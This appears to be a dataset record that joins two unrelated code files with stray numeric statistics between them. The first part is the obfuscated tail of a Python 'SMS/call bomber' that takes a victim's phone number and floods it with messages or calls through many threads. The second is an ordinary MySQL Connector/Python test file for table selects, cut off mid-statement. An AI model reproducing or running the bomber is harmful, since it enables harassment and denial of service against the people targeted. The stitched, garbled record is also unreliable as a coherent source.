)#line:448:print(" Successful Requests : ", success) print (" Failed Requests : ",OOO0O000OOO00O00O )#line:449:print(" Failed Requests : ", failed) print ("==================================================================")#line:450:print("==================================================================") print (" To Contract Me { +8801687262566 } !! #Love Bangladesh ✓ ")#line:451:print(" To Contract Me { +8801687262566 } !! #Love Bangladesh ✓ ") print (" This Bomber Was Created By Alamin Islam!! ")#line:452:print(" This Bomber Was Created By Alamin Islam !! ") print ("==================================================================")#line:453:print("==================================================================") try :#line:455:try: O0O0OO00OO00OO0O0 =getapi (OOO000OO00O000000 ,OOO000OOO00OOO000 ,OO0O0000O0OO0O000 )#line:456:result = getapi(target, api, cc) except Exception :#line:457:except Exception: O0O0OO00OO00OO0O0 =False #line:458:result = False OOOOO0O0O0O00OO0O =OOOOO0O0O0O00OO0O +1 #line:459:requested = requested + 1 if O0O0OO00OO00OO0O0 :#line:460:if result: O00O00000OO0O000O =O00O00000OO0O000O +1 #line:461:success = success + 1 else :#line:462:else: OOO0O000OOO00O00O =OOO0O000OOO00O00O +1 #line:463:failed = failed + 1 while O00OOO000OOO0O000 .count (OOO000OOO00OOO000 )>0 :#line:464:while ch.count(api) > 0: O00OOO000OOO0O000 .remove (OOO000OOO00OOO000 )#line:465:ch.remove(api) time .sleep (float (O0000000OOO00OOO0 ))#line:466:time.sleep(float(delay)) if OOOOO0O0O0O00OO0O %3 ==0 :#line:467:if requested % 3 == 0: checkinternet ()#line:468:checkinternet() print ('\n\nBombing Completed..')#line:469:print('\n\nBombing Completed..') os .system ('rm *.xxx* > /dev/null 2>&1')#line:470:os.system('rm *.xxx* > /dev/null 2>&1') banner ()#line:471:banner() exit ()#line:472:exit() os .system ("clear")#line:475:os.system("clear") banner ()#line:476:banner() try :#line:477:try: urllib .request .urlopen ('https://www.google.com')#line:478:urllib.request.urlopen('https://www.google.com') except Exception :#line:479:except Exception: print ("You are not connected To Internet!!!")#line:480:print("You are not connected To Internet!!!") print ("\tPlease Connect To Internet To Continue...\n")#line:481:print("\tPlease Connect To Internet To Continue...\n") input ('Exiting....\n Press Enter To Continue....')#line:482:input('Exiting....\n Press Enter To Continue....') exit ()#line:483:exit() if len (noti )>10 :#line:485:if len(noti) > 10: print ('\n\n\tNOTIFICATION: '+noti +'\n\n')#line:486:print('\n\n\tNOTIFICATION: ' + noti + '\n\n') except Exception :#line:487:except Exception: pass #line:488:pass while True :#line:489:while True: pn =""#line:490:pn = "" cc =input ("\tEnter Your Country Code (Without +) { For BD User Type 880 } : ")#line:491:cc = input("\tEnter Your Country Code (Without +) { For BD User Type 880 } : ") if '+'in cc :#line:492:if '+' in cc: tc =list (cc )#line:493:tc = list(cc) tc .remove ('+')#line:494:tc.remove('+') cc =''.join (tc )#line:495:cc = ''.join(tc) cc =cc .strip ()#line:496:cc = cc.strip() pn =input ("\tEnter Target Number: +"+cc +" ")#line:497:pn = input("\tEnter Target Number: +" + cc + " ") pn =remsp (pn )#line:498:pn = remsp(pn) if len (cc )>=4 or len (cc )<1 :#line:499:if len(cc) >= 4 or len(cc) < 1: print ('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')#line:500:print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n') continue #line:501:continue if len (pn )<=6 :#line:502:if len(pn) <= 6: print ('\n\nInvalid Phone Number..\n')#line:503:print('\n\nInvalid Phone Number..\n') continue #line:504:continue for cch in str (cc +pn ):#line:505:for cch in str(cc + pn): if not cch .isdigit ():#line:506:if not cch.isdigit(): print ('\n\nPhone Number Must Consist Of Numbers Only\n')#line:507:print('\n\nPhone Number Must Consist Of Numbers Only\n') continue #line:508:continue break #line:509:break type =0 #line:510:type = 0 try :#line:511:try: if sys .argv [1 ]=="call":#line:512:if sys.argv[1] == "call": type =1 #line:513:type = 1 except Exception :#line:514:except Exception: type =0 #line:515:type = 0 if type ==1 :#line:516:if type == 1: nm =int (input ("Enter Number of Calls To Send(Maximum 100): "))#line:517:nm = int(input("Enter Number of Calls To Send(Maximum 100): ")) if nm >15 :#line:518:if nm > 15: print ("\t\tYou Have Entered "+str (nm )+".\n\tNormalizing Value To 100")#line:520:".\n\tNormalizing Value To 100") nm =15 #line:521:nm = 15 dl =float (input ("Enter Delay time (in seconds) [Recommended 5 sec ] : "))#line:522:dl = float(input("Enter Delay time (in seconds) [Recommended 5 sec ] : ")) elif type ==0 :#line:523:elif type == 0: if cc =="91":#line:524:if cc == "91": nm =int (input ("Enter Number of Messages To Send(0 For Unlimited): "))#line:525:nm = int(input("Enter Number of Messages To Send(0 For Unlimited): ")) dl =float (input ("Enter Delay time (in seconds) [Recommended 1 sec ] : "))#line:527:input("Enter Delay time (in seconds) [Recommended 1 sec ] : ")) else :#line:528:else: nm =int (input ("Enter Number of Messages To Send: "))#line:529:nm = int(input("Enter Number of Messages To Send: ")) dl =float (input ("Enter Delay time (in seconds) [Recommended 5 sec ] : "))#line:531:input("Enter Delay time (in seconds) [Recommended 5 sec ] : ")) maxlim =0 #line:532:maxlim = 0 if cc =="91":#line:533:if cc == "91": maxlim =5000 #line:534:maxlim = 5000 else :#line:535:else: maxlim =5000 #line:536:maxlim = 5000 if nm >maxlim :#line:537:if nm > maxlim: print ('\n\n\tSorry Due To Misuse Of This Script We Only Provide '+str (maxlim )+' SMS At Once...\n\n')#line:539:str(maxlim) + ' SMS At Once...\n\n') print ('Number Of SMS Has been Set To '+str (maxlim ))#line:540:print('Number Of SMS Has been Set To ' + str(maxlim)) nm =maxlim #line:541:nm = maxlim if not cc .strip ()=="91":#line:542:if not cc.strip() == "91": if type ==1 :#line:543:if type == 1: print ('\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')#line:545:'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!') print ()#line:546:print() input ('Press Enter To Exit....')#line:547:input('Press Enter To Exit....') print ('\n\n')#line:548:print('\n\n') exit ()#line:550:exit() cnt =0 #line:551:cnt = 0 if pn .strip ()==''or dl <=0 or nm <=0 or cc .strip ()==''or cc .find ('+')!=-1 :#line:552:if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1: print ('\n\n\tSeems Like You Have Given Wrong Inputs...')#line:553:print('\n\n\tSeems Like You Have Given Wrong Inputs...') input ('\n\t\tPress Enter To Exit...')#line:554:input('\n\t\tPress Enter To Exit...') exit ()#line:556:exit() ch =[0 ,14 ,15 ,16 ]#line:557:ch = [0, 14, 15, 16] start (pn ,nm ,dl ,ch ,str (cc ))#line:558:start(pn, nm, dl, ch, str(cc)) exit ()#line:559:exit() ch =[OO00OO000O00O0O0O for OO00OO000O00O0O0O in range (17 )]#line:560:ch = [i for i in range(17)] cbomb =False #line:561:cbomb = False if pn .strip ()==''or dl <=0 or nm <0 :#line:562:if pn.strip() == '' or dl <= 0 or nm < 0: print ('\n\n\tSeems Like You Have Given Wrong Inputs...')#line:563:print('\n\n\tSeems Like You Have Given Wrong Inputs...') input ('\n\t\tPress Enter To Exit...')#line:564:input('\n\t\tPress Enter To Exit...') banner ()#line:565:banner() exit ()#line:566:exit() if type ==1 :#line:567:if type == 1: print ("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")#line:568:print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n") print ("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")#line:569:print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...") cbomb =True #line:570:cbomb = True if cbomb :#line:571:if cbomb: chl =[100 ,101 ,102 ,103 ,104 ,105 ,106 ]#line:572:chl = [100, 101, 102, 103, 104, 105, 106] start (pn ,nm ,dl ,chl ,str (cc ))#line:573:start(pn, nm, dl, chl, str(cc)) exit ()#line:574:exit() if nm ==0 :#line:575:if nm == 0: nt =int (input ("\tNumber Of Threads(10 to 50) : "))#line:576:nt = int(input("\tNumber Of Threads(10 to 50) : ")) if nt <=0 or nt >=50 :#line:577:if nt <= 0 or nt >= 50: print ('\tBD Bomber Shows Better Result in 10 to 50 Threads\n\t\tStill Continuing....')#line:578:print('\tTBomb Shows Better Result in 10 to 50 Threads\n\t\tStill Continuing....') print ("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")#line:579:print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...") t =[None ]*nt #line:580:t = [None] * nt print ("\n\n==================================================================")#line:581:print("\n\n==================================================================") print (" Gearing Up Bomber, please wait !! ")#line:582:print(" Gearing Up Bomber, please wait !! ") print (" Please keep your data connection active during bombing !! ")#line:583:print(" Please keep your data connection active during bombing !! ") print ("==================================================================")#line:584:print("==================================================================") print (" Target Number : +91",pn )#line:585:print(" Target Number : +91", pn) print (" Number of Threads : ",nt )#line:586:print(" Number of Threads : ", nt) print (" Delay : ",dl )#line:587:print(" Delay : ", dl) print ("==================================================================")#line:588:print("==================================================================") print (" Use this for fun, not for revenge !! ")#line:589:print(" Use this for fun, not for revenge !! ") print (" This Bomber Was Created By Alamin Islam !! ")#line:590:print(" This Bomber Was edited BY BLACKLABEL cradits to owner@speedx !! ") print ("==================================================================")#line:591:print("==================================================================") input ('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')#line:592:input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n') os .system ('rm *.xxx* > /dev/null 2>&1')#line:593:os.system('rm *.xxx* > /dev/null 2>&1') print ("\n\nStarting Bomb....")#line:594:print("\n\nStarting Bomb....") for i in range (nt ):#line:595:for i in range(nt): t [i ]=threading .Thread (target =infinite ,args =(pn ,dl ,ch ,maxlim ,))#line:596:t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,)) t [i ].daemon =True #line:597:t[i].daemon = True t [i ].start ()#line:598:t[i].start() time .sleep (1 )#line:599:time.sleep(1) ci =0 #line:600:ci = 0 while True :#line:601:while True: ci +=1 #line:602:ci += 1 l =count_inf #line:603:l = count_inf print (" Total Number of Requests Sent : ",l )#line:604:print(" Total Number of Requests Sent : ", l) if int (l )>maxlim :#line:605:if int(l) > maxlim: print ('\n\n\tSorry Due To Misuse Of This Script We Only Provide unlimited'+str (maxlim )+' SMS At Once...\n\n')#line:607:str(maxlim) + ' SMS At Once...\n\n') input ('Press Enter To Exit...')#line:608:input('Press Enter To Exit...') os .system ('rm *xxx* > /dev/null 2>&1')#line:609:os.system('rm *xxx* > /dev/null 2>&1') banner ()#line:610:banner() exit ()#line:611:exit() time .sleep (1 )#line:612:time.sleep(1) if ci %3 ==0 :#line:613:if ci % 3 == 0: checkinternet ()#line:614:checkinternet() else :#line:615:else: start (pn ,nm ,dl ,ch ,'91')#line:616:start(pn, nm, dl, ch, '91') exit ()#line:617:exit()
182.235294
4,438
0.673426
9,280
68,156
5.111315
0.172953
0.026269
0.004174
0.006072
0.741235
0.724475
0.712162
0.687053
0.670609
0.651846
0
0.14608
0.110408
68,156
373
4,439
182.723861
0.605021
0.443174
0
0.325069
0
0.082645
0.684174
0.355929
0
1
0
0
0
1
0.016529
false
0.00551
0.038567
0
0.126722
0.162534
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
1
1
0
0
0
0
0
0
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
7
d70484767a46bf7bcecabce244195f29e4474d6d
86,541
py
Python
tests/qa/test_qa_mysqlx_crud_table_select.py
timgates42/mysql-connector-python
c4729e84a6849fe584034663af39c0ccde92fe44
[ "BSD-3-Clause" ]
null
null
null
tests/qa/test_qa_mysqlx_crud_table_select.py
timgates42/mysql-connector-python
c4729e84a6849fe584034663af39c0ccde92fe44
[ "BSD-3-Clause" ]
1
2021-09-12T22:07:20.000Z
2021-09-12T22:07:20.000Z
tests/qa/test_qa_mysqlx_crud_table_select.py
timgates42/mysql-connector-python
c4729e84a6849fe584034663af39c0ccde92fe44
[ "BSD-3-Clause" ]
null
null
null
# Copyright (c) 2021, Oracle and/or its affiliates. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License, version 2.0, as # published by the Free Software Foundation. # # This program is also distributed with certain software (including # but not limited to OpenSSL) that is licensed under separate terms, # as designated in a particular file or component or in included license # documentation. The authors of MySQL hereby grant you an # additional permission to link the program and your derivative works # with the separately licensed software that they have included with # MySQL. # # Without limiting anything contained in the foregoing, this file, # which is part of MySQL Connector/Python, is also subject to the # Universal FOSS Exception, version 1.0, a copy of which can be found at # http://oss.oracle.com/licenses/universal-foss-exception. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU General Public License, version 2.0, for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import threading import time import unittest import mysqlx import tests @unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 25), "XPlugin not compatible") class TableSelectTests(tests.MySQLxTests): """Tests for table.select(). """ @tests.foreach_session() def test_table_select1(self): self.session.sql("drop table if exists t1").execute() """Test the table.select with where.""" self.session.sql("create table t1(a int , b int)").execute() table = self.schema.get_table("t1") table.insert().values(1, 1).values(2, 1).values(3, 2).execute() result = table.select("a").where("b== 1").execute() row = result.fetch_all() self.assertEqual(len(row), 2) self.assertEqual(row[1]["a"], 2) self.session.sql("drop table if exists t1").execute() @tests.foreach_session() def test_table_select2(self): """Test the table.select with sort and limit.""" self.session.sql("drop table if exists t2").execute() self.session.sql("create table t2(a int , b varchar(32))").execute() table = self.schema.get_table("t2") table.insert().values(1, "a").values(2, "c").values(3, "b").values( 4, "d" ).execute() result = ( table.select("a").sort("b ASC").limit(2).execute() ) # sort() is deprecated since 8.0.12, use order_by() row = result.fetch_all() self.assertEqual(len(row), 2) self.assertEqual(row[1]["a"], 3) self.session.sql("drop table if exists t2").execute() @tests.foreach_session() def test_table_select3(self): """Test the table.select with bind.""" self.session.sql("drop table if exists t3").execute() self.session.sql("create table t3(a int , b int)").execute() table = self.schema.get_table("t3") table.insert().values(1, 1).values(2, 1).values(3, 2).execute() result = table.select("a").where("b== :b").bind("b", 1).execute() row = result.fetch_all() self.assertEqual(len(row), 2) self.assertEqual(row[1]["a"], 2) self.session.sql("drop table if exists t3").execute() @tests.foreach_session() def test_table_select4(self): """Test the table.select with no data.""" self.session.sql("drop table if exists t4").execute() self.session.sql("create table t4(a int , b int)").execute() table = self.schema.get_table("t4") result = table.select("a").where("b== 1").execute() row = result.fetch_all() self.assertEqual(row, []) self.session.sql("drop table if exists t4").execute() @tests.foreach_session() def test_table_select5(self): """Test the table.select on a invalid column.""" self.session.sql("drop table if exists t5").execute() self.session.sql("create table t5(a int , b int)").execute() table = self.schema.get_table("t5") table.insert().values(1, 1).values(2, 1).values(3, 2).execute() self.assertRaises( mysqlx.OperationalError, table.select("abc").execute, ) self.session.sql("drop table if exists t5").execute() @tests.foreach_session() def test_table_select6(self): """Test the table.select.""" self.session.sql("drop table if exists t6").execute() self.session.sql( "create table t6(a int , name varchar(32),age int)" ).execute() table = self.schema.get_table("t6") table.insert().values(1, "a", 20).values(2, "a", 21).values( 3, "b", 34 ).values(4, "b", 35).execute() result = table.select().where("a > 1 and a < 4").execute() row = result.fetch_all() self.assertEqual(len(row), 2) self.assertEqual(row[0]["name"], "a") self.assertEqual(row[1]["name"], "b") self.session.sql("drop table if exists t6").execute() @tests.foreach_session() def test_table_select7(self): """Test the table.select with group by.""" self.session.sql("drop table if exists t7").execute() self.session.sql("set sql_mode=''").execute() self.session.sql( "create table t7(a int , name varchar(32),age int)" ).execute() table = self.schema.get_table("t7") table.insert().values(1, "a", 20).values(2, "a", 21).values( 3, "b", 34 ).values(4, "b", 35).execute() result = ( table.select() .group_by("name") .sort("age ASC") .having("age > 30") .execute() ) row = result.fetch_all() self.assertEqual(len(row), 1) self.assertEqual(row[0]["age"], 34) self.session.sql("drop table if exists t7").execute() @tests.foreach_session() def test_table_select8(self): """Test the table.select with param list.""" self.session.sql("drop table if exists t8").execute() self.session.sql("create table t8(a int , b int, c int)").execute() table = self.schema.get_table("t8") table.insert().values(1, 3, 1).values(2, 1, 2).values( 3, 2, 3 ).execute() result = table.select("a", "b").where("c== 1").execute() row = result.fetch_all() self.assertEqual(row[0]["a"], 1) self.assertEqual(row[0]["b"], 3) self.session.sql("drop table if exists t8").execute() @tests.foreach_session() def test_table_select9(self): """Test the table.select with group by and param.""" self.session.sql("drop table if exists t9").execute() self.session.sql("set sql_mode=''").execute() self.session.sql("create table t9(a int , b int)").execute() table = self.schema.get_table("t9") table.insert().values(1, 10).values(1, 10).values(2, 20).values( 2, 30 ).execute() result = table.select("a", "b").group_by("a", "b").execute() row = result.fetch_all() self.assertEqual(row[0]["b"], 10) self.assertEqual(row[2]["b"], 30) self.session.sql("drop table if exists t9").execute() @tests.foreach_session() def test_table_select10(self): self.session.sql("drop table if exists t10").execute() self.session.sql("create table t10(a int , b int)").execute() table = self.schema.get_table("t10") table.insert().values(1, 10).values(1, 11).values(2, 10).values( 2, 11 ).execute() result = table.select("a", "b").sort("a ASC", "b DESC").execute() row = result.fetch_all() self.assertEqual(row[0]["b"], 11) self.assertEqual(row[3]["b"], 10) self.session.sql("drop table if exists t10").execute() @tests.foreach_session() def test_table_select11(self): """Test for bug25519251.""" self.session.sql("drop table if exists t11").execute() self.session.sql( "create table t11 (age INT, name VARCHAR(50))" ).execute() self.session.sql("INSERT INTO t11 VALUES (21, 'Fred')").execute() self.session.sql("INSERT INTO t11 VALUES (28, 'Barney')").execute() self.session.sql("INSERT INTO t11 VALUES (42, 'Wilma')").execute() self.session.sql("INSERT INTO t11 VALUES (67, 'Betty')").execute() table = self.schema.get_table("t11") result = table.select().order_by("age DESC").execute() row = result.fetch_all() self.assertEqual(row[0]["name"], "Betty") self.assertEqual(row[3]["name"], "Fred") self.session.sql("drop table if exists t11").execute() @tests.foreach_session() def test_table_select12(self): """Test table.select with limit() and offset() methods.""" self.session.sql("drop table if exists t12").execute() self.session.sql("create table t12(a int , b int)").execute() table = self.schema.get_table("t12") table.insert().values(1, 10).values(1, 11).values(2, 10).values( 2, 11 ).execute() result = ( table.select("a", "b").limit(1, 1).execute() ) # limit(x,y) is deprecated since 8.0.12 row = result.fetch_all() self.assertEqual(len(row), 1) self.assertEqual(row[0]["b"], 11) self.session.sql("drop table if exists t12").execute() @tests.foreach_session() def test_table_select13(self): """Test table.select with negative value to limit() method.""" self.session.sql("drop table if exists t13").execute() self.session.sql("create table t13(a int , b int)").execute() table = self.schema.get_table("t13") table.insert().values(1, 10).values(1, 11).values(2, 10).values( 2, 11 ).execute() try: table.select("a", "b").limit(-1).execute() except ValueError: # Expected a ValueError pass self.session.sql("drop table if exists t13").execute() @tests.foreach_session() def test_table_select14(self): """Test table.select with negative value to offset() method.""" self.session.sql("drop table if exists t14").execute() self.session.sql("create table t14(a int , b int)").execute() table = self.schema.get_table("t14") table.insert().values(1, 10).values(1, 11).values(2, 10).values( 2, 11 ).execute() try: result = table.select("a", "b").limit(2).offset(-1).execute() except ValueError: # Expected a ValueError pass self.session.sql("drop table if exists t14").execute() @tests.foreach_session() def test_table_select15(self): """Test get_columns().""" self.session.sql("drop table if exists t15").execute() self.session.sql( "create table t15(a int , name varchar(32),age int)" ).execute() table = self.schema.get_table("t15") table.insert().values(1, "a", 20).values(2, "a", 21).values( 3, "b", 34 ).values(4, "b", 35).execute() result = table.select().where("a > 1 and a < 4").execute() cols = result.get_columns() self.session.sql("drop table if exists t15").execute() @tests.foreach_session() def test_table_select16(self): """Test new properties of Column.""" self.session.sql("drop table if exists t16").execute() config = tests.get_mysqlx_config() schema_name = config["schema"] self.session.sql( "create table t16(a int , name varchar(32),age int)" ).execute() table = self.schema.get_table("t16") table.insert().values(1, "a", 20).values(2, "a", 21).values( 3, "b", 34 ).values(4, "b", 35).execute() result = table.select().where("a > 1 and a < 4").execute() cols = result.get_columns() col0 = cols[0] self.assertEqual(col0.schema_name, schema_name) self.assertEqual(col0.table_name, "t16") self.assertEqual(col0.table_label, "t16") self.assertEqual(col0.column_name, "a") self.assertEqual(col0.column_label, "a") self.assertEqual(col0.type, mysqlx.ColumnType.INT) self.assertEqual(col0.length, 11) self.assertEqual(col0.fractional_digits, 0) col1 = cols[1] self.assertEqual(col1.schema_name, schema_name) self.assertEqual(col1.table_name, "t16") self.assertEqual(col1.table_label, "t16") self.assertEqual(col1.column_name, "name") self.assertEqual(col1.column_label, "name") self.assertEqual(col1.type, mysqlx.ColumnType.STRING) self.assertEqual(col1.collation_name, "utf8mb4_0900_ai_ci") self.assertEqual(col1.character_set_name, "utf8mb4") self.session.sql("drop table if exists t16").execute() @tests.foreach_session() def test_operator2(self): """Test unary operator not.""" self.session.sql("drop table if exists t1").execute() self.session.sql("create table t1(a int, b boolean)").execute() table = self.schema.get_table("t1") table.insert().values(1, True).values(2, False).execute() result = table.select("not b as b").where("a == 1").execute() row = result.fetch_all() self.assertEqual(row[0]["b"], 0) self.session.sql("drop table if exists t1").execute() @tests.foreach_session() def test_operator3(self): """Test binary operator in.""" self.session.sql("drop table if exists t2").execute() self.session.sql("create table t2(a int , b int)").execute() table = self.schema.get_table("t2") table.insert().values(1, 1).values(2, 2).execute() result = table.select("2 IN (0,2,4,6)").execute() result.fetch_all() self.session.sql("drop table if exists t2").execute() @tests.foreach_session() def test_operator5(self): self.session.sql("drop table if exists t3").execute() self.session.sql("create table t3(data json)").execute() table = self.schema.get_table("t3") table.insert().values('{"_id":1,"age":20}').execute() result = table.select("data->'$.age' as age").execute() result.fetch_all() self.session.sql("drop table if exists t3").execute() # Testing the contains operator with single operand on both sides @tests.foreach_session() def test_contains_operator_select1(self): """Test IN operator with string on both sides - With LHS in RHS.""" self.session.sql("drop table if exists t1").execute() self.session.sql("create table t1(a int , b int, c JSON)").execute() table = self.schema.get_table("t1") table.insert().values(1, 1, '{"comp":"abc"}').values( 2, 1, '{"comp":"pqr"}' ).values(3, 2, '{"comp":"xyz"}').execute() result = table.select("a").where("'pqr' IN c->'$.comp'").execute() row = result.fetch_all() self.assertEqual(len(row), 1) self.assertEqual(row[0]["a"], 2) self.session.sql("drop table if exists t1").execute() @tests.foreach_session() def test_contains_operator_select2(self): """Test IN operator with int as operand - With LHS in RHS.""" self.session.sql("drop table if exists t2").execute() self.session.sql( "create table t2(name varchar(20) , a JSON, c varchar(20))" ).execute() table = self.schema.get_table("t2") table.insert().values("a", '{"age":21}', "abc").values( "b", '{"age":31}', "pqr" ).values("hell", '{"age":22}', "xyz").execute() result = table.select().where("a->$.age IN [21,31]").execute() self.assertEqual(len(result.fetch_all()), 2) self.session.sql("drop table if exists t2").execute() @tests.foreach_session() def test_contains_operator_select3(self): """Test IN operator with boolean as operand - With LHS in RHS.""" self.session.sql("drop table if exists t3").execute() self.session.sql("create table t3(n JSON, a json, c JSON)").execute() table = self.schema.get_table("t3") table.insert().values( '{"name":"joy"}', '{"age":18}', '{"comp":"abc"}' ).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values( '{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}' ).execute() result = table.select().where("21 IN a->'$.age'").execute() self.assertEqual(len(result.fetch_all()), 1) self.session.sql("drop table if exists t3").execute() @tests.foreach_session() def test_contains_operator_select4(self): """Test NOT IN operator with string operand - With LHS not in RHS.""" self.session.sql("drop table if exists t4").execute() self.session.sql("create table t4(n JSON, age int, c JSON)").execute() table = self.schema.get_table("t4") table.insert().values('{"name":"joy"}', 18, '{"comp":"abc"}').values( '{"name":"happy"}', 21, '{"comp":"pqr"}' ).values('{"name":"sad"}', 32, '{"comp":"xyz"}').execute() result = table.select().where("'happy' NOT IN n->'$.name'").execute() self.assertEqual(len(result.fetch_all()), 2) self.session.sql("drop table if exists t4").execute() @tests.foreach_session() def test_contains_operator_select5(self): """Test NOT IN operator with int as operand - With LHS not in RHS.""" self.session.sql("drop table if exists t5").execute() self.session.sql("create table t5(n JSON, a JSON, c JSON)").execute() table = self.schema.get_table("t5") table.insert().values( '{"name":"joy"}', '{"age":18}', '{"comp":"abc"}' ).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values( '{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}' ).execute() result = table.select().where("21 NOT IN a->'$.age'").execute() self.assertEqual(len(result.fetch_all()), 2) self.session.sql("drop table if exists t5").execute() @tests.foreach_session() def test_contains_operator_select6(self): """Test NOT IN operator with boolean as operand - With LHS not in RHS.""" self.session.sql("drop table if exists t6").execute() self.session.sql( "create table t6(name varchar(20) , age int, c json)" ).execute() table = self.schema.get_table("t6") table.insert().values("a", 21, '{"comp":"pqr"}').values( "b", 31, '{"comp":"xyz"}' ).values("e", 22, '{"comp":"xyz"}').execute() result = table.select().where("c->'$.comp' IN ['pqr','abc']").execute() self.assertEqual(len(result.fetch_all()), 1) self.session.sql("drop table if exists t6").execute() @tests.foreach_session() def test_contains_operator_select7(self): """Test IN operator with different datatypes as operands.""" self.session.sql("drop table if exists t7").execute() self.session.sql("create table t7(n JSON, a json, c JSON)").execute() table = self.schema.get_table("t7") table.insert().values( '{"name":"joy"}', '{"age":18}', '{"comp":"abc"}' ).values('{"name":"happy"}', '{"age":21}', '{"comp":"pqr"}').values( '{"name":"sad"}', '{"age":32}', '{"comp":"xyz"}' ).execute() result = table.select().where("21 IN n->'$.name'").execute() result1 = table.select().where("'b' IN a->$.age").limit(1).execute() self.assertEqual(len(result.fetch_all()), 0) self.assertEqual(len(result1.fetch_all()), 0) self.session.sql("drop table if exists t7").execute() @tests.foreach_session() def test_contains_operator_select8(self): """Test IN operator with single element on LHS and array/list on RHS and vice versa.""" self.session.sql("drop table if exists t8").execute() self.session.sql( "create table t8(id int, n JSON, a JSON, p JSON)" ).execute() table = self.schema.get_table("t8") table.insert().values( 1, '{"name":"a"}', '{"age":21}', '{"prof":["x","y"]}' ).values(2, '{"name":"b"}', '{"age":24}', '{"prof":["p","q"]}').values( 3, '{"name":"c"}', '{"age":26}', '{"prof":["l","m"]}' ).execute() result = table.select().where("a->$.age IN [21,23,24,28]").execute() result1 = ( table.select() .where("n->'$.name' IN ['a','b','c','d','e']") .execute() ) result2 = table.select().where("a->$.age IN (21,23)").execute() result3 = table.select().where("21 IN (22,23)").limit(1).execute() result4 = table.select().where("['p','q'] IN p->'$.prof'").execute() self.assertEqual(len(result.fetch_all()), 2) self.assertEqual(len(result1.fetch_all()), 3) self.assertEqual(len(result2.fetch_all()), 1) self.assertEqual(len(result3.fetch_all()), 0) self.assertEqual(len(result4.fetch_all()), 1) self.session.sql("drop table if exists t8").execute() @tests.foreach_session() def test_contains_operator_select9(self): """Test IN operator with single element on LHS and dict on RHS and vice versa.""" self.session.sql("drop table if exists t9").execute() self.session.sql( "create table t9(id int, name varchar(20), a JSON, ai JSON)" ).execute() table = self.schema.get_table("t9") table.insert().values( 1, "a", '{"age":23}', '{"additionalinfo":["reading","music","playing"]}', ).values( 2, "b", '{"age":21}', '{"additionalinfo":["boxing","music"]}' ).execute() result = ( table.select().where("'reading' IN ai->$.additionalinfo").execute() ) result1 = table.select().where("'music' IN a->$.age").execute() result2 = ( table.select().where("'music' IN ai->$.additionalinfo").execute() ) self.assertEqual(len(result.fetch_all()), 1) self.assertEqual(len(result1.fetch_all()), 0) self.assertEqual(len(result2.fetch_all()), 2) self.session.sql("drop table if exists t9").execute() @tests.foreach_session() def test_contains_operator_select10(self): """Test IN operator with array/list operand on LHS and array/list on RHS.""" self.session.sql("drop table if exists t10").execute() self.session.sql( "create table t10(i JSON, n JSON, a JSON, ai JSON)" ).execute() table = self.schema.get_table("t10") table.insert().values( '{"id":1}', '{"name":"joy"}', '{"age":21}', '{"additionalinfo":["reading","music","playing"]}', ).values( '{"id":2}', '{"name":"happy"}', '{"age":24}', '{"additionalinfo":["playing","painting","boxing"]}', ).execute() result = ( table.select() .where("['playing','painting','boxing'] IN ai->'$.additionalinfo'") .execute() ) result1 = ( table.select() .where('["happy","joy"] IN n->$.name') .limit(1) .execute() ) result2 = ( table.select() .where('["reading"] NOT IN ai->$.additionalinfo') .limit(1) .execute() ) self.assertEqual(len(result.fetch_all()), 1) self.assertEqual(len(result1.fetch_all()), 0) self.assertEqual(len(result2.fetch_all()), 1) self.session.sql("drop table if exists t10").execute() @tests.foreach_session() def test_contains_operator_select11(self): """Test IN operator with dict on LHS and dict on RHS.""" self.session.sql("drop table if exists t11").execute() self.session.sql( "create table t11(i JSON, n JSON, a JSON, ai JSON)" ).execute() table = self.schema.get_table("t11") table.insert().values( '{"id":1}', '{"name":"joy"}', '{"age":21}', '{"additionalinfo":[{"company":"xyz","vehicle":"bike"},{"company":"abc","vehicle":"car"},{"company":"mno","vehicle":"zeep"}]}', ).values( '{"id":2}', '{"name":"happy"}', '{"age":24}', '{"additionalinfo":[{"company":"abc","vehicle":"car"},{"company":"pqr","vehicle":"bicycle"}]}', ).execute() result = table.select( '{"company":"abc","vehicle":"car"} IN ai->"$.additionalinfo"' ).execute() result1 = ( table.select() .where('{"vehicle":"car"} NOT IN ai->"$.additionalinfo"') .execute() ) result2 = ( table.select() .where('{"company":"mno"} IN ai->"$.additionalinfo"') .execute() ) self.assertEqual(len(result.fetch_all()), 2) self.assertEqual(len(result1.fetch_all()), 0) self.assertEqual(len(result2.fetch_all()), 1) self.session.sql("drop table if exists t11").execute() @tests.foreach_session() def test_contains_operator_select12(self): """Test IN operator with operands having expressions.""" self.session.sql("drop table if exists t12").execute() self.session.sql( "create table t12(id int, name varchar(20), age int)" ).execute() table = self.schema.get_table("t12") table.insert().values(1, "a", 21).values(2, "b", 22).values( 3, "c", 32 ).execute() result = ( 